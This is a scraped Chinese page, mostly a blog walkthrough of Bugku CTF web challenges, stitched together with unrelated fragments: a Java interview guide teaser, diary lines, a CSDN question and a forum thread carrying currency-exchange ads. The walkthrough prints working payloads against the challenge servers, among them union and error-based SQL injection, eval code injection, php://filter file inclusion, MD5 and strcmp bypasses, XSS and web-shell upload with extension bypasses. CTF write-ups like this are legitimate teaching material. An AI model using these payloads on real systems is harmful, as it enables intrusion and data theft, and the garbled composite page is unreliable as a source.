Web报错,求大佬甜解决!

瓦力识别-答非所问赞同 添加评论分享收藏感谢收起Bugku------Web(持续更新) - 简书
Bugku------Web(持续更新)
我使用的是火狐浏览器使用火狐浏览器的hackbar插件如果有错误的地方希望大家多多指出,多谢多谢WEB2点开图片是一组滑稽脸,按F12直接可得flag文件上传测试通过上传.png文件,得知非php文件,于是采用burp进行修改上传的文件。
得到flag计算器:直接按F12,将
在输入正确结果即可得到flagweb基础$_GET```$what=$_GET['what'];echo $if($what=='flag')echo 'flag{****}';```根据题意,直接将what赋值为flag
web基础$_POST和上到题差不多,然后就这样
得到flag矛盾观察题目,应该是使用is_numeric遇到%00截断的漏洞,这里构造http://120.24.86.145:8002/get/index1.php?num=1%00得到flagweb3界面有点不尽 的弹窗,应该是使用了大量的alert语句,直接查看网页源代码最后一行是这样的
使用html解码,得到flagsql注入在题目后面加',网页出错,说明有sql注入漏洞,查看网页源代码,查看是什么语言编码"",考虑宽字节注入。?id=1%bf',程序报错?id=1%bf' --+程序又恢复正常那么我们就要开始工作喽?id=1%bf' and version()&0--+,返回正确,则数据库可能为sqlserver和mysql?id=1%bf' and length(user())&0 --+ 返回正确,说明存在user()函数,是mysql数据库?id=1%bf' order by 2--+ 采用order by 语句查询数据库的列数,为2?id=1%bf' union select 1,2--+ 来确定回显我们这里采用其中的一个回显位置?id=1%bf' union select database(),2--+ 查询数据库名称为sql5?id=1%bf' union select string,2 from sql5.key where id=1--+ 然后查询key表,id=1的string字段得到flag域名解析域名解析需要修改hosts文件,这里我们使用ubuntun虚拟机进行这道题的解答
首先输入这样打开hosts文件
将host文件修改为这样,然后直接访问flag.bugku.com得到flagSQL注入1和SQL注入差不多,我们来看看这道题,这道题与上到题差距不大,这里只是加入了XSS过滤,但是XSS过滤,strip_tags()会将html,php,xml标签全都去掉,利用这一特点,我们来进行解题老规矩:http://103.238.227.13:10087/'
存在SQL注入漏洞http://103.238.227.13:10087/?id=1%20o%3Cp%3Erder%20by%202--+ 判断程序的字段名为2http://103.238.227.13:10087/id=1%20un%3Cp%3Eion%20se%3Cp%3Elect%20database(),2--+
判断数据库名称为sql3http://103.238.227.13:10087/?id=1%20un%3Cp%3Eion%20se%3Cp%3Elect%20hash,2%20fro%3Cp%3Em%20sql3.key%20where%20id=1--+
查找表为key的数据表,id=1值hash字段值得到flag你必须让他停下打开网站后网页一直都在跳动,而且页面不同,猜测flag在其中的一些网页中,采用burp一帧帧的看,在Repeter多次go,很容易就得到了flag本地包含方法一
对_REQUEST[]函数并不是很了解,百度得到它对get/Post都可以接受
其中第一句话include“flag.php”说明该文件在本地
第二句话要获得hello的值,由于hello为’hello’,所以无论在url栏中对hello赋任何值,都会全盘接受,其中var_dump()是将a打印到界面中,在根据eval函数的特性(计算后面括号中的表达式)
根据这一特性,我们尝试将flag.php文件直接输出构造如下:http://120.24.86.145:8003/?hello=1);print_r(file("./flag.php"));%23使原文语句为```
eval(“var_dump(1);print_r(file(“./flag.php”))”)```方法二:
另外一种方法是直接对hello赋值为hello=file_get_contents('flag.php')
然后查按F12可以知道flag变量1首先观察程序,很明显看到了$$args,考虑到此题可能考GLOBALS变量,直接构造如下赋值即可:http://120.24.86.145:8004/index1.php?args=GLOBALS得到flagweb5查看网页源代码,发现了一大堆[]()组合,考虑是JSFUCK,直接将括号复制到谷歌浏览器的控制台运行得到flag头等舱
采用burp抓包:
提交flag即可web4查看网页源代码p1=%..%...;p2=%..%...题目最后p1+%..%...+p2先进行URL解码```p1=function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2bp2=aa648cf6e87a7114f1"==a.value)return!0;alert("Error");a.focus();return!1}}document.getElementById("levelQuest").onsubmit=checkS%35%34%61%61%32=54aa2```提交67d709b2b54aa2aa648cf6e87a7114f1得到flagflag在index里将网页点开,在点击相应连接,网页地址栏变为:http://120.24.86.145:8005/post/index.php?file=show.php看到了file关键字,看看用php://filter能否将index读出来http://120.24.86.145:8005/post/index.php?file=php://filter/read/convert.base64-encode/resource=index.php将得到了base64解码,观察程序得到flag输入密码查看flag直接burp爆破点击一百万次真正点击100 0000 是不可能的,尝试F12修改点击次数,未果修改程序中的jsp代码,未果查看网页源代码,根据 if(clicks &= 1000000)直接将clicks赋值为(POST方法),查看结果 得到flag备份是个好习惯打开网页d41d8cd98f00b204e9800998ecfcd98f00b204e9800998ecf8427e将里面的东西解码,每个解码的方式都试过了,未果,观察里面的加密值,发现先后重复将d41d8cd98f00b204e9800998ecf8427e解密
然后在flag中试了各种与空有关的东西,未果。观察题目,说备份是个好习惯猜测应该与备份有关小知识:
备份文件一般情况是在后缀名后加的*.swp,*.bak
http://120.24.86.145:8002/web16/ 默认访问的是该路径的index.php文件看看里面有什么东西http://120.24.86.145:8002/web16/index.php.bak访问成功了,随便用个什么编辑器把这个东西打开,我这里使用的是bycharm(给在校大学生安利一波),里面的代码是这样滴:```include_once "flag.php";ini_set("display_errors", 0);$str = strstr($_SERVER['REQUEST_URI'], '?');$str = substr($str,1);$str = str_replace('key','',$str);parse_str($str);echo md5($key1);echo md5($key2);if(md5($key1) == md5($key2) && $key1 !== $key2){echo $flag."取得flag";```要求key1和key2的md5值相等,但是值不相等百度得这两个值为和QNKCDZO,尝试赋值,并没有什么变化继续观察源程序,发现程序中将key字符变为空,考虑用kkeyey取代key,然后果然得到了flag成绩单向其中分别输入1,2,3...发现可以查询,当向其中输入1'时,程序不能查询,根据观察题目,猜测应该有4列输入0,没有查询结果,在这里使用0作为回显,输入0' union select 1,2,3,4 #
得到相应的值先查询数据名称0' union select database(),2,3,4; 为skctf_flag然后查询表名```id=0' union select table_name,2,3,4 from information_schema.tables where table_schema='skctf_flag'#```查到为flag4,继续查询列名,得到skctf_flag,然后继续查询,得到flag秋名山老司机要求在2秒之内计算结果,多次刷新界面,有时候回出现如下界面:
无奈,只好写一个脚本,对value赋值,这里将代码贴上```import requestsimport reimport base64url='http://120.24.86.145:8002/web6/'s=requests.session()r=s.get(url)flag=r.headers['flag']print(flag)flag1=base64.b64decode(flag)print(flag1)flag2=base64.b64decode(str(flag1).split(":")[1][1:-1])#将flag分为两部分,[1:-1]就是获取到的值print(flag2)data={"margin":flag2}r=s.post(url,data)print(r.text)```cookies欺骗打开网页后是一堆乱码,但是看到url中filename=a2V5cy50eHQ=,尝试解码,get文件夹keys.txt,打开什么也没有。由于keys.txt是以base64编码输入的,我们不妨以base64编码的方式传入index.php,看看有什么结果也是什么也没有。尝试将地址栏中的line赋值为1,终于出现了一行代码,然后估计line为几,就是读取第几行,一行行试的比较麻烦,这里写一个脚本来获取整个index.php文件,这里贴上代码:```import reimport requestsurl='http://120.24.86.145:8002/web11/index.php?line=%d&filename=aW5kZXgucGhw'for iin range(100):url1=url%ic1=requests.get(url1).textprint(c1)if c1=='':break```得到的index.php文件中的代码如下:```'keys.txt','1' =&'index.php',);if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){$file_list[2]='keys.php';}if(in_array($file, $file_list)){$fa = file($file);echo $fa[$line];}?&```看到了keys.php猜测flag在这里。然后在flag.php中传入margin=margin,得到flag
XSS查看网页源代码,感觉只有可能给变量id和s赋值,这里先采用id赋值
然后查看网页源代码
发现其中的&&被过滤,这样就简单了,使用unicode编码进行绕过?id=\u003cscript\u003ealert(_key_)\u003c/script\u003e进行输入,得到flagnever give
up查看网页源代码,发现了1p.html,直接访问,发现跳转回主界面但是1p.html是实实在在存在,而且还在当前目录,考虑如何访问1p.html
查看源代码中直接将index.php修改为1p.html,没想到竟然成功访问了
将得到的语句进行Base64解码,根据解码的结果在进行一次url解码,查看源代码,发现当前目录存在f4l2a3g.txt,访问得到flagwelcome to bugkuctf查看源代码,访问hint.php,正常来讲,一个php文件是有内容的,考虑如何访问到hint.php程序需要先使user的值与welcome to the bugkuctf相同,但是这里有file_get_contents()函数可以采用php://input才访问原始请求数据的只读流,这里将txt赋值为php://input在post相应的值。
具体操作流程
将file赋值为phpfilter读相应的base64编码的文件。代码如下:
看到了flag.php,估计我们的flag就在其中,通过访问hin.php的方式在来访问flag.php,方法不可行,就需要考虑其他的方法了。通过思考,一种可行的方法就是通过在index.php(如果一个地址栏末端是'/',则默认是index.php)中通过一些方法使hint.php加入其中,在通过一定的方法使hin.php包含flag.php 而我们看到的index.php文件只有一段注释性的代码,里面应该还有一些其他的东西,尝试是否可以访问。直接将一开始插图中的hint.php改为index.php就好了。
果然,其中还是藏有许多东西的(将代码复制粘贴出来保存为txt文件):
这里用到了反序列化(我并不是很熟悉,多亏大佬的帮助),这里附上源代码:
反序列化的源代码
这样思路就清楚了,尝试给password复制为反序列化的值,查看结果
反序列化的值就是password那堆恶心的东西
然后查看源代码就拿到了flag.过狗一句话看题目意思应该就是需要给s赋值,看到题目的时候也是觉得无从下手,多谢大佬的指点,使得做题在有了一些眉目。
首先将s赋值为phpinfo(),发现可以访问,说明s可以输出我们输入的结果
然后题目一般flag文件都在.php文件中显示,尝试查看所有的文件
s=print_r(glob('*.*'))
然后可以看到flag文件,直接访问相应的flag文件得到flag字符?正则?看题目就是给id根据正则表达式的条件赋值,我的赋值是这样的:http://120.24.86.145:8002/web10/?id=/keyaakeyaaaaakey:/a/aakeya'/i然后就拿到了flag前女友(SKCTF)点击查看源代码,然后在查看code.txt,代码如下:
意思大致就是v1!=v2,md5值相等,之前提到过,是和QNKCDZO,然后比较v3和flag,这里利用了strcmp的一个漏洞,不能比较数组,这里我的构造如下:
成功拿到flaglogin1(SKCTF)这道题是一个登陆框,登陆admin,提示用户已经存在,后来自己注册了一个账号,结果不是管理员不能查看flag,未果。在考虑如何使用admin登陆,刚开始使用万能密码登陆,结果没有登陆成功,然后尝试用约束攻击,约束攻击的原理就是注册用户名为'admin
'(有多个空格,这里是三个)的账号,密码'123'(密码可以自定义),然后登陆成功,但是数据库会返回表中的第一个用户,也就是真真实实的admin(这个漏洞只可能在老版本的sql中出现,新版本的mysql已经修复漏洞),然后就可以用admin的身份登陆网页,拿到flag。
这里我注册的账号为‘admin
’(三空格),密码为‘ABCabc123’然后就成功以管理员的身份拿到了flag
不过好像提交不了,这个题可能被破坏了吧?你从哪里来
这个题是真的好迷啊,刚开始做没做出来,打开界面就这么一句话:are you from google?
然后改了半天没出来,后来用谷歌也没打开,甚至翻到了国外用谷歌来访问这个题还是老样子。
后来在群里激烈的讨论了下才知道原来是这么做的啊:
将这个地方改为谷歌原生的网址就好了:https://www.google.com中国用谷歌会默认转到香港hk。md5 collision(NUPT_CTF)
md5碰撞,emmmm,这道题算是做了好久,脑洞不够大!!!!打开文件,要求输入a的值,不过文件的后缀名是.php(一般要用到0e开头的),这里就需要补充一波常识了:
在php文件中,以MD5值以0e开头的话,php就会认为他们两个的值相等
。所以可以写个脚本来跑出一个以0e开头的
不过这里跑出来的是数字,然后没有通过检测,可能需要使用字符串。
编程能力有限,然后直接在网站上找了以0e开头的字符串:
http://www.219.me/posts/2884.html然后直接选其中一个提交拿到flag
各种绕过看到了flag.php,鸡动的赶紧看看能不能直接看,然后未果。考虑开始好好看一遍题目
最开始获取id时需要用urldecode解码(如果没有用url编码,解码还是原来的东西)第一行的比较中,uname必须!=passwd才可以继续第二次比较中,sha1是哈希算法,可以使用数组绕过这样payload就比较简单了,这里我附上我的payload
获得flagweb8打开网页,附上源代码:
题上 的 代码
看到了熟悉的file_get_contents函数,可以使用php://input给fn赋值,ac直接赋值,然后使两个相等就可以了,知道题还是比较简单的,这里附上我的payload
我的payload
想办法变成admin
刚打开题目网页
看到题目吧,还是比较懵的,给的两个按钮点击有没有什么用,然后就看看网页呗。题目的意思打开是在找文件或目录,这样我们先来看一下网页可以直接访问的文件有哪些:
一般网站都会有robots.txt文件的,存放可以直接访问的文件子目录
根据提示,在看看resusl.php文件
resusl.php
看到以后慌的一批,考虑换个ip做这道题,但是还是先看看不换ip能不能做题目中的一个小提示是想办法变成admin,题目中需要获取x的值,自然想到直接将x赋值为admin,没想到直接就拿到了flag,这道题难度也不是很大。求getshell这道题是文件上传题,本来用菜刀做了一小会,然后bugku好像把菜刀给ban了。无奈,用burp来做这道题。然后直接上传菜刀中的一句话木马
123.php里面的 东西
这道题后来尝试了好久,但是没有做出来,无奈,只好找大佬寻求帮助大佬说这道题是后缀名黑名单检测和类型检测
如果是walf严格匹配,通过修改Content-type后字母的大小写可以绕过检测,使得需要上传的文件可以到达服务器端,而服务器的容错率较高,一般我们上传的文件可以解析。然后就需要确定我们如何上传文件,这里将文件的后缀名改为.jpg和.png都不可行,在分别将后缀名修改为php2, php3, php4, php5, phps, pht, phtm, phtml(php的别名),发现只有php5没有被过滤,成功上传,得到flag
我滴payload
INSERT INTO注入点开题目,有如下程序代码:
观察程序,程序关闭的了错误报告 ,大致意思是将访问者的ip记录到数据库进行查询。然后点开其中的链接,网站记录了其中的ip地址,可以想到http头注入,而且我也是第一次接触头部注入,只会稍稍用一下XFF
发现无论在XFF后添加什么东西,都会返回原来的东西,所以应该是Insert型的SQL注入,考虑时间盲注
通过测试,这样会进行延时5秒,说明是时间盲注,而且是字符型的时间盲注我也是第一次接触时间盲注,心里慌的一批,这里采用暴力法寻找数据库名,表名,字段名和内容。原理就是超时等待,我们先来爆破数据库:
爆破数据库名称的代码
代码比较多,而且大部分都是重复的,这里我说一下思路,先盲注得到数据库,在爆破表、字段,最后在盲注指定的数据,得到flag。这道题第一次做真的是相当的难,我也戈了好久。这是一个神奇的登陆框这道题还算比较简单。打开题目,随便输个什么用户名,这里以amsoasod为例,loadurl,界面框如下图所示:
我所弄的东西
然后点击执行,结果当然是try again!,首先在用户名后面加个\,出现错误,则存在注入漏洞
然后尝试怎么将漏洞利用,在"后面加了--+,不行,但是%23和#都可以,然后就可以注入了,利用order by确定列数admin_name=amsoasod" order by 2%23&admin_passwd=aaaa&submit=GO+GO+GO确定回显:admin_name=amsoasod" union select 1,2%23&admin_passwd=aaaa&submit=GO+GO+GO确定数据库名称:admin_name=amsoasod" union select database(),2%23&admin_passwd=aaaa&submit=GO+GO+GO确定数据库里面的表
admin_name=amsoasod" union select table_name,2 from information_schema.tables where table_schema='bugkusql1'%23&admin_passwd=aaaa&submit=GO+GO+GO确定表中的字段:admin_name=amsoasod" union select column_name,2 from information_schema.columns where table_schema='bugkusql1' and table_name='flag1'%23&admin_passwd=aaaa&submit=GO+GO+GO然后获取其中的数据:admin_name=amsoasod" union select flag1,2 from bugkusql1.flag1%23&admin_passwd=aaaa&submit=GO+GO+GO多次
本题有2个flagPHP_encrypt_1(ISCCCTF)文件包含2
一打开之后题目是这样的:http://118.89.219.210:49166/index.php?file=hello.php然后查看源代码,没什么有用的东西,但是其中应该会隐藏什么然后采用php://filter查看网页:http://118.89.219.210:49166/index.php?file=php://filter/read/convert.baer64-encode/resource=hello.php然后查看源代码:
view-source:http://118.89.219.210:49166/index.php?file=php://filter/read/convert.baer64-encode/resource=hello.php
访问http://118.89.219.210:49166/upload.php
我直接上传了一个小马
然后采用菜刀连接,结果连接如下图所示
就是说其中的&?php和?&已经被屏蔽了,使得脚本无法执行,然后尝试修改文件,使得不会过滤,其中的一种过滤方法是
可以看到代码不会过滤,但是菜刀竟然连不上,可能是被ban了。然后采用burp抓包,将这个文件进行发送:
然后访问这个文件
访问第四个文件,可以得到flag。flag.php
点了login咋没反应
提示:hint
题目中的框
输入东西,然后点击login,果然没反应,然后尝试抓包,鬼也没抓到。所以这个登陆框就只是给人看的,然后地址栏是这样:http://120.24.86.145:8002/flagphp/,顺便百度一下hint是线索的意思,尝试访问hint.*,然后鬼也没出来,然后尝试将hint赋值为1,然后就出来源代码了???,这里吧源代码粘上吧:
http://120.24.86.145:8002/flagphp/?hint=1
先尝试访问flag.php,然后失败了,然后观察程序程序的意思就是加入cookie:ISecer的反序列化等于KEY,然后又在最下方给出了KEY的值,这样就很简单了直接用burp抓包,然后直接在cookie中加入ISecer='ISecer:www.isecer.com' 的值,结果提交老没用,只好继续观察程序,看哪里出问题了,才发现最下面那是给KEY赋值,只好修改payload,是ISecer为空,提交:
我的payload
得到flagsql注入2
全都tm过滤了绝望吗?
提示 !,!=,=,+,-,^,%这道题按照之前的套路墨迹了好久,没有找到注入点,没有找到回显,蓝瘦,然后百度了一波教程,说是DS_Store典型的源码泄漏,网上找找工具,将网站扫描一下,就能找到flag。最后直接访问http://120.24.86.145:8007/web2/flag,就可以下载到flag孙xx的博客
需要用到渗透测试第一步信息收集
点开blog,浏览一哈全部的博客,然后看到了这
点开看看如下图
网页里面有用的东西
这两个东西很容易就能联想到时用户名密码,可是这里应该是哪里的用户名密码,
尝试访问phpmyadmin,没想到成功访问了,然后把上面这两个东西分别作为用户名密码输进去,然后就可以成功登入了,然后
数据库的东西
直接点击它,然后查看里面的东西直接就得到了flag报错注入
这道题使用了报错注入,关于报错注入vinc大佬的博文写的是很好的:
http://vinc.top//另外,论坛中对报错注入的两篇博文也写的比较详细:http://www.bugku.com/forum.php?mod=viewthread&tid=152&highlight=%B1%A8%B4%EDhttp://www.bugku.com/forum.php?mod=viewthread&tid=93&highlight=%B1%A8%B4%ED其实 我也是第一次使用报错注入,就来现学现用吧。
题目中不能包含空格,根据muysql的特性,可以用换行符(%0a)代替空格符,这里我使用的报错时extractvalue。首先来测试一下:
报错注入成功了,然后我们就可以为所欲为了。工具题目的提示,我们需要访问文件/var/test/key_1.php,就需要在extractvalue函数中使用读取文件的函数来读取到该文件,但是经过百度读取文件的函数load_file的语法是:
,这就比较难为人,不过采用ASCIIhex加密就不需要加
了,具体payload如下:
32个字符解密出来是这样的:
很明显这不是一个完整的php文件,尝试将其读完整。而且中间比较乱的部分可能就是flag,为什么没有读取完整呢?
load_file文件本身读取时没有问题的,但是extractvalue函数的性质就是只能读32位这里使用substr(str,start,length)函数来读取剩下的文件。然后不断的用起点和长度来试探flag,得到的最终paylaod如下:
然后提交了好几次都没提交成功,后来才发现原来这里个flag是不完整的,哎然后需要将substr(str,start,length)函数中的start和length函数进行相应的调整就可以获得全部的flag。Trim的日记本
hints:不要一次就放弃login2(SKCTF)
hint:union,命令执行
login3(SKCTF)
hint:基于布尔的SQL盲注login4
hint:CBC字节翻转攻击先写这么多,有时间的话之后再补上
学了忘,忘了学,学了还得忘。
忘了学,学了忘,忘了还得学。
说你行你就行不行也行,
说你不行你就不行行也不行。
pdf下载地址:Java面试宝典 第一章内容介绍 20 第二章JavaSE基础 21 一、Java面向对象 21 1. 面向对象都有哪些特性以及你对这些特性的理解 21 2. 访问权限修饰符public、private、protected, 以及不写(默认)时的区别(201...
?开启? 【iAPP实现进入界面执行逐一显】 〖 15:22:14〗 《//首先开一个线程,因为你有这么多的stop要执行,其次必须使用ufusui(),否则可能不会显示你的字体。切记:文字必须设置“text=”,否则很尴尬,还有我这里的8,14是两个文...
WEB2 看源代码得flag 文件上传测试 找一张图片上传,截包改后缀名为.php得flag 计算题 F12修改输入框允许长度 web$_GET ?what=flag Web$_POST Requests.post(url,data={‘what’:’flag’}).tex...
《裕语言》速成开发手册3.0 官方用户交流:iApp开发交流(1) iApp开发交流(2) iApp开发交流(3) iApp开发交流(4) iApp开发交流(5) iApp游戏开发交流...
《ilua》速成开发手册3.0 官方用户交流:iApp开发交流(1) iApp开发交流(2) iApp开发交流(3) iApp开发交流(4) iApp开发交流(5) iApp游戏开发交...
时间:日 内容: 1.晨起:六点半 2.健身:马甲线练习一次 3.学习:阅读杨鲁新新书《教研一体》,收获大。 4.工作:完成第五模块作文初稿 5.生活:看到紫竹院湖泊中的两只鸟,百感交集。
一个企业中,战略,组织,人都是很重要的,三者共同存在。 我们与公司以合作为前提,公司给予薪资,最重要的是在获取工资的过程中可以有一样的价值观,得到公司的认同,关系才可以更长久。
本文首发自微信公共帐号: 学习学习再学习(xiaolai-xuexi);李笑来 学习英语的最少必要知识是什么呢? 1.学会音标: 音标知识一个符号系统,相当于中国的拼音,外国人也学音标的。英语是目前词汇量最多的语言,遇到生词的概率很高,要会去查字典并学会发音。任何人,花一个...
当旧人远去, 当流年沉寂, 当历史平息, 道只道, 物是人非, 情怀依旧……
拖拉着一箱不成的计划,回乡的我日日睡得稀里哗啦。 然而这一天必须早些起的原因,竟然是要去一场喜宴,且还只能说是去,毕竟主人公全然不认识绝不能有什么诚心的祝贺,而交出的那叠不薄的份子钱也使得这一趟并不能被称作蹭吃蹭喝。 稀里糊涂一圈下来,我的恐婚症又要发作了。 大型喜宴的菜色...ios11 WKwebview打包的html元素样式向下偏移,跪求大佬看看 =。=
[问题点数:200分]
本版专家分:0
CSDN今日推荐
本版专家分:9487
2015年8月 移动开发大版内专家分月排行榜第二
本版专家分:0
本版专家分:0
匿名用户不能发表回复!|
其他相关推荐查看: 1815|回复: 4
大佬们。请问这里怎么验证
主题帖子积分
新手上路, 积分 14, 距离下一级还需 36 积分
新手上路, 积分 14, 距离下一级还需 36 积分
在线时间0 小时
QQ图片56.png (10.36 KB, 下载次数: 2)
13:56 上传
QQ图片05.png (12.73 KB, 下载次数: 2)
13:57 上传
QQ图片10.png (10.28 KB, 下载次数: 3)
13:57 上传
我想问一下这里怎么验证
主题帖子积分
新手上路, 积分 14, 距离下一级还需 36 积分
新手上路, 积分 14, 距离下一级还需 36 积分
在线时间0 小时
我想取消限额,但是需要验证,我不知道在哪里输入验证码
主题帖子积分
新手上路, 积分 14, 距离下一级还需 36 积分
新手上路, 积分 14, 距离下一级还需 36 积分
在线时间0 小时
已经解决了,
主题帖子积分
普通会员, 积分 445, 距离下一级还需 55 积分
普通会员, 积分 445, 距离下一级还需 55 积分
在线时间22 小时
【WMZ兑换服务】本次6.8特价(包0.8%手续费)WMZ仅作促销用,数量有限只为信誉不为钱,为杜绝骗子全部使用淘宝咸鱼交易,骗子滚远点我们分秒揭穿你!本次促销只为客户体验我们的极速WMZ兑换,凡是联系过QQ后再拍下的朋友都能做到付款后60-120秒到账,欢迎诚信的朋友联系购买!
QQ群:,欢迎大家加入探讨
购买之前务必注意以下几点:
1、无法保证收货后立即确认请勿拍!资金回笼等不起望理解。(这是合作的基本前提)
2、拍之前先QQ后再拍下的朋友都能做到付款后60-120秒到账。
3、请一定确认自己的Z钱包账户能正常使用后再拍。
4、拍时必须将Z钱包号发至淘宝客服旺旺或咸鱼聊天处,并确保Z钱包号输入正确,我们将按此Z钱包号进行转账。
主题帖子积分
普通会员, 积分 387, 距离下一级还需 113 积分
普通会员, 积分 387, 距离下一级还需 113 积分
在线时间30 小时
6.7 大量出 wmz
自动发货&&秒到
Copyright &
& All Rights Reserved.
Powered by

我要回帖

更多关于 大佬甜er 的文章

 

随机推荐